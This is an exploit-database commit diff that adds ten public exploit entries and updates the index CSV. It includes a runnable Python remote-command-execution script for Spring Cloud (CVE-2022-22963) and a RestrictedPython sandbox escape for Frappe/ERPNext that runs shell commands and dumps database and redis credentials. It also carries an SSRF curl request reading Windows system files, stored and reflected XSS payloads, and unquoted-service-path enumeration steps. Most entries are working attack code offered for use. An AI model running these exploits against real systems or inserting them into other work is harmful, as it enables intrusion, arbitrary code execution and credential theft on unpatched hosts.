DB: 2023-07-12

10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
2023-07-12 00:16:54 +00:00 · 2023-07-12 00:16:54 +00:00 · 00f5021452
commit 00f5021452
parent 743db0e747
10 changed files with 325 additions and 2 deletions
--- a/exploits/hardware/webapps/51582.txt
+++ b/exploits/hardware/webapps/51582.txt
@ -0,0 +1,71 @@
 #Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
 #Exploit Author: LiquidWorm
 Vendor: Ateme
 Product web page: https://www.ateme.com
 Affected version: 3.9.12.4
                  3.9.11.0
                  3.9.9.2
                  3.9.8.0
 Summary: TITAN File is a multi-codec/format video transcoding
 software, for mezzanine, STB and ABR VOD, PostProduction, Playout
 and Archive applications. TITAN File is based on ATEME 5th Generation
 STREAM compression engine and delivers the highest video quality
 at minimum bitrates with accelerated parallel processing.
 Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
 exists in the Titan File video transcoding software. The application
 parses user supplied data in the job callback url GET parameter. Since
 no validation is carried out on the parameter, an attacker can specify
 an external domain and force the application to make an HTTP/DNS/File
 request to an arbitrary destination. This can be used by an external
 attacker for example to bypass firewalls and initiate a service, file
 and network enumeration on the internal network through the affected
 application.
 Tested on: Microsoft Windows
           NodeJS
           Ateme KFE Software
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2023-5781
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php
 22.04.2023
 --
 curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
         -H "User-Agent: sunee-mode" \
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"
 Call to file://C:\\windows\\system.ini returned 0
 ---
 HTTP from Server
 ----------------
 POST / HTTP/1.1
 Host: ssrftest.zeroscience.mk
 Accept: */*
 Content-Type: application/xml
 Content-Length: 192
 <?xml version='1.0' encoding='UTF-8' ?>
 <update>
   <id>0000</id>
   <name>dummy test job</name>
   <status>aborted</status>
   <progress>50</progress>
   <message>message</message>
 </update>
--- a/exploits/java/webapps/51576.txt
+++ b/exploits/java/webapps/51576.txt
@ -0,0 +1,17 @@
 # Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
 # Exploit Author: tmrswrr
 # Vendor Homepage: https://decapcms.org/docs/intro/
 # Software Link: https://github.com/decaporg/decap-cms
 # Version: 2.10.192
 # Tested on: https://cms-demo.netlify.com
 Description:
 1. Go to new post and write body field your payload:
 https://cms-demo.netlify.com/#/collections/posts
 Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
 2. After save it XSS payload will executed and see alert box
--- a/exploits/java/webapps/51577.py
+++ b/exploits/java/webapps/51577.py
@ -0,0 +1,23 @@
 # Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
 # Date: 07/07/2023
 # Exploit Author: GatoGamer1155, 0bfxgh0st
 # Vendor Homepage: https://spring.io/projects/spring-cloud-function/
 # Description: Exploit to execute commands exploiting CVE-2022-22963
 # Software Link: https://spring.io/projects/spring-cloud-function
 # CVE: CVE-2022-22963
 import requests, argparse, json
 parser = argparse.ArgumentParser()
 parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
 parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
 args = parser.parse_args()
 print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")
 headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }
 data = {"data": ""}
 request = requests.post(args.url, data=data, headers=headers)
 response = json.dumps(json.loads(request.text), indent=2)
 print(response)
--- a/exploits/php/webapps/51581.txt
+++ b/exploits/php/webapps/51581.txt
@ -0,0 +1,16 @@
 # Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
 # Date: 06/07/2023
 # Exploit Author: Idan Malihi
 # Vendor Homepage: None
 # Version: 5
 # Tested on: Microsoft Windows 10 Pro
 # CVE : CVE-2023-36163
 #PoC:
 An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
 '><script>prompt("XSS");</script><div id="aa
 After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
 #Payload:
 company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
--- a/exploits/python/webapps/51580.txt
+++ b/exploits/python/webapps/51580.txt
@ -0,0 +1,47 @@
 # Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
 # Exploit Author: Sander Ferdinand
 # Date: 2023-06-07
 # Version: 13.4.0
 # Vendor Homepage: http://erpnext.org
 # Software Link: https://github.com/frappe/frappe/
 # Tested on: Ubuntu 22.04
 # CVE : none
 Silly sandbox escape.
 > Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.
 Requirements:
 - 'System Manager' role (which is not necessarily the admin)
 - Server config `server_script_enabled` set to `true` (likely)
 Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.
 ```python3
 hax = "echo pwned > /tmp/pwned"
 g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
 for x in g:0
 ```
 Context:
 - https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
 - https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
 - https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
 - https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42
 Bonus:
 More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:
 ```python3
 hax = """
 {g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
 """.strip()
 g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
 for x in g:0
 ```
 Which prints the Frappe config like database/redis credentials, etc.
 In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
--- a/exploits/windows/local/51578.txt
+++ b/exploits/windows/local/51578.txt
@ -0,0 +1,34 @@
 # Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
 # Date: 06/07/2023
 # Exploit Author: Idan Malihi
 # Vendor Homepage: https://www.minitool.com/
 # Software Link: https://www.minitool.com/download-center/
 # Version: 12.7
 # Tested on: Microsoft Windows 10 Pro
 # CVE : CVE-2023-36164
 # PoC
 C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 MTAgentService                                                                      MTAgentService                            C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe                             Auto
 C:\Users>sc qc MTAgentService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: MTAgentService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTAgentService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users>systeminfo
 Host Name:                 DESKTOP-LA7J17P
 OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.19042 N/A Build 19042
 OS Manufacturer:           Microsoft Corporation
--- a/exploits/windows/local/51579.txt
+++ b/exploits/windows/local/51579.txt
@ -0,0 +1,34 @@
 # Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
 # Date: 06/07/2023
 # Exploit Author: Idan Malihi
 # Vendor Homepage: https://www.minitool.com/
 # Software Link: https://www.minitool.com/download-center/
 # Version: 12.7
 # Tested on: Microsoft Windows 10 Pro
 # CVE : CVE-2023-36165
 #PoC
 C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 MTSchedulerService                                                                  MTSchedulerService                        C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe                         Auto
 C:\Users>sc qc MTSchedulerService
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users>systeminfo
 Host Name:                 DESKTOP-LA7J17P
 OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.19042 N/A Build 19042
 OS Manufacturer:           Microsoft Corporation
--- a/exploits/windows/local/51583.txt
+++ b/exploits/windows/local/51583.txt
@ -0,0 +1,34 @@
 # Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
 # Date: 06/07/2023
 # Exploit Author: Idan Malihi
 # Vendor Homepage: https://www.avg.com
 # Software Link: https://www.avg.com/en-ww/homepage#pc
 # Version: 7.5
 # Tested on: Microsoft Windows 10 Pro
 # CVE : CVE-2023-36167
 #PoC
 C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 AVG Anti-Spyware Guard                                                              AVG Anti-Spyware Guard                    C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe                            Auto
 C:\Users>sc qc "AVG Anti-Spyware Guard"
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: AVG Anti-Spyware Guard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AVG Anti-Spyware Guard
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users>systeminfo
 Host Name:                 DESKTOP-LA7J17P
 OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.19042 N/A Build 19042
 OS Manufacturer:           Microsoft Corporation
--- a/exploits/windows/local/51584.txt
+++ b/exploits/windows/local/51584.txt
@ -0,0 +1,38 @@
 # Exploit Title: Game Jackal Server v5 - Unquoted Service Path
 # Date: 06/07/2023
 # Exploit Author: Idan Malihi
 # Vendor Homepage: https://www.allradiosoft.ru
 # Software Link: https://www.allradiosoft.ru/en/ss/index.htm
 # Version: 5
 # Tested on: Microsoft Windows 10 Pro
 # CVE : CVE-2023-36166
 #PoC
 C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
 auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 Game Jackal Server v5
        GJServiceV5                               C:\Program Files
 (x86)\SlySoft\Game Jackal v5\Server.exe                                 Auto
 C:\Users>sc qc GJServiceV5
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: GJServiceV5
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal
 v5\Server.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Game Jackal Server v5
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users>systeminfo
 Host Name:                 DESKTOP-LA7J17P
 OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.19042 N/A Build 19042
 OS Manufacturer:           Microsoft Corporation
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -4043,6 +4043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",webapps,hardware,,2017-03-10,2017-03-10,0,CVE-2017-6549,,,,,https://bierbaumer.net/security/asuswrt/
 44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80,2018-06-25,2018-06-25,0,,"Cross-Site Request Forgery (CSRF)",,,,
 39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,webapps,hardware,80,2016-06-16,2016-06-16,0,,,,,,
 51582,exploits/hardware/webapps/51582.txt,"Ateme TITAN File 3.9 - SSRF File Enumeration",2023-07-11,LiquidWorm,webapps,hardware,,2023-07-11,2023-07-11,0,,,,,,
 49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,,2020-11-30,2020-11-30,0,,,,,,
 46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,,2019-05-22,2019-05-29,0,CVE-2019-11368,,,,,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,,2019-06-03,2019-06-03,0,,,,,,
@ -5526,6 +5527,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info
 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info
 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,,
 51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,,
 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info
 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info
@ -5577,6 +5579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz,
 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,,
 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info
 51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,,
 50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",2022-03-07,"Carlos E. Vieira",webapps,java,,2022-03-07,2022-03-07,0,CVE-2022-22947,,,,,
@ -15104,6 +15107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,webapps,php,,2007-06-24,,1,OSVDB-40152;CVE-2007-3448;OSVDB-38223;CVE-2007-3447;OSVDB-38205;CVE-2007-3446,,,,,http://www.h4cky0u.org/viewtopic.php?t=26834
 15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",webapps,php,,2010-11-13,2010-11-13,0,,,,,,
 3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",webapps,php,,2007-05-16,,1,OSVDB-37955;CVE-2007-2762;OSVDB-37954;OSVDB-37953;OSVDB-37952;OSVDB-37951;OSVDB-37950;OSVDB-37949,,,,,
 51581,exploits/php/webapps/51581.txt,"BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)",2023-07-11,"Idan Malihi",webapps,php,,2023-07-11,2023-07-11,0,CVE-2023-36163,,,,,
 40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,webapps,php,80,2016-09-19,2016-09-26,1,,,,,http://www.exploit-db.comBuilderEngine-CMS-V3.zip,
 29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33821,,,,,https://www.securityfocus.com/bid/22783/info
 29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33822,,,,,https://www.securityfocus.com/bid/22783/info
@ -25469,9 +25473,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php,,2017-03-26,2017-03-27,0,,,,,,
 7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,webapps,php,,2009-01-21,2017-01-23,1,OSVDB-51642;CVE-2009-0279,,,,http://www.exploit-db.compardalcms-0.2.0.tar.bz2,
 2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,webapps,php,,2006-12-18,2016-09-21,1,OSVDB-35709;CVE-2006-6739,,,,http://www.exploit-db.comparistemi-0_8_3.zip,
-48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0  - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,,
+48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0  - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2023-07-11,1,,,,,,
 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0  - Authentication Bypass",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,,
-49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,
+49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2023-07-11,1,,,,,,
 12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,,2010-05-26,,1,,,,,,
 17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,webapps,php,,2011-05-02,2011-05-02,1,,,,,,
 45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.compar6lus_11_20160225.exe,
@ -34562,6 +34566,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
 51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
@ -39409,6 +39414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",local,windows,,2005-02-23,,1,OSVDB-14206;CVE-2005-0506,,,,,
 17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,local,windows,,2011-09-20,2011-09-24,1,OSVDB-84578,,,http://www.exploit-db.com/screenshots/idlt18000/17877.png,http://www.exploit-db.comavcon.exe,
 12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",local,windows,,2010-05-06,2011-03-03,1,,,,,http://www.exploit-db.comavcon.exe,
 51583,exploits/windows/local/51583.txt,"AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36167,,,,,
 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,,2015-02-04,2015-02-04,0,CVE-2014-9632;OSVDB-113824,,,,,
 18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,local,windows,,2011-11-13,2011-11-13,1,OSVDB-77043,"Metasploit Framework (MSF)",,,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows,,2012-11-26,2017-08-17,1,OSVDB-77043,,,http://www.exploit-db.com/screenshots/idlt23000/screen-shot-2012-11-26-at-120023-pm.png,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
@ -39988,6 +39994,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",local,windows,,2009-12-06,,1,OSVDB-60897,,,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
 16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows,,2010-09-25,2011-03-10,1,OSVDB-60897,"Metasploit Framework (MSF)",,,,
 10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows,,2009-12-06,,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
 51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,,
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
@ -40815,6 +40822,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,local,windows,,2010-11-20,2016-09-16,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15575.png,http://www.exploit-db.comminishare-1.5.5.zip,
 15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,,2010-11-03,2018-12-19,1,,,,,http://www.exploit-db.comminishare-1.5.5.zip,
 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",2022-04-11,"Saud Alenazi",local,windows,,2022-04-11,2022-04-11,0,,,,,,
 51578,exploits/windows/local/51578.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36164,,,,,
 51579,exploits/windows/local/51579.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36165,,,,,
 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,,2021-01-04,2021-01-04,0,,,,,,
 19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",local,windows,,2000-06-06,2012-07-21,1,CVE-2000-0552;OSVDB-1376,,,,,https://www.securityfocus.com/bid/1307/info
